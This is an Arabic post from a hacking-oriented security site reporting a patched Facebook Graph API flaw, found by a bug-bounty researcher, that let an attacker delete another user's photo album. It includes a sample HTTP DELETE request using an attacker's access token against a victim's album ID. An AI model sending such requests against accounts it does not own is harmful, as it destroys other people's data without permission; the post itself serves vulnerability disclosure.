شبكة القرصان

امن,اختراق,برامج,حماية,هكر,اختراق مواقع و سرفرات,اختراق ايميلات و اجهزة,حماية الانظمة,تطوير مواقع,حماية مواقع,دروس و شروحات,تقنية المعلومات,تحميل,Download,laptop,hacker,leran,programs,iptables,,Security,free soft,server,attack,hacker web

اخبار

ثغرة في الفيس بوك تسمح للهاكر بحذف البوم صور المستخدم

السلام عليكم

تمكن احد الهاكرز من اكتشاف ثغرة تمكن الهاكر من حذف اي البوم صور من الفيس بوك من دون صلاحيات

ويدعى Laxman Muthiyah ولقد استلم مكافئة من الفيس بوك 12 الف دولار لمساعدة فريق الفيس بوك لترقيع الثغرة

اكتشف الثغرة ف Graph API والي تتطلب access token

مثال كيف يتم استغلال الثغرة عبر ارسال استعلام


Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

 

يمكنكم مشاهدة الفيديو

https://www.youtube.com/watch?v=93EdTtVJKBU

اطيب الامنيات

 

اترك ردا

لن يتم نشر عنوان بريدك الإلكتروني.